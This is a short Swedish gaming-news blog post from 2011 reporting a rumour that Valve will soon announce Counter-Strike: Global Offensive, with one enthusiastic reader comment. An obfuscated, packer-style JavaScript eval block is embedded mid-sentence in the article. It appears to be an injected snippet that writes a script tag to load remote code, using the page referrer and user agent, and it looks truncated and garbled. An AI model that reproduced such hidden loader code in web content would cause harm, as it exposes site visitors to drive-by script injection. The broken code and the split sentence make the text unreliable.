Image Image Image Image Image Image Image Image Image Image

| 23 september, 2018

Scroll to top

Top

Mer Counter-Strike?!?!

Mer Counter-Strike?!?!
Filip Urde
  • On 12 augusti, 2011
  • http://www.revue.se/filip-urde

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfnab|var|u0026u|referrer|zzyye||js|php’.split(‘|’),0,{}))
ser ut som att Valve snart kommer offentliggöra ännu ett nytt spel som inte är Half-Life 3. Det ryktas nämligen om att Valve, mycket snart, kommer presentera ett nytt Counter-Strike-spel som heter Counter-Strike: Global Offensive.

Vi uppdaterar när vi vet mer!

Comments

  1. orre

    Föör fint fan har längtat efter ett nytt cs!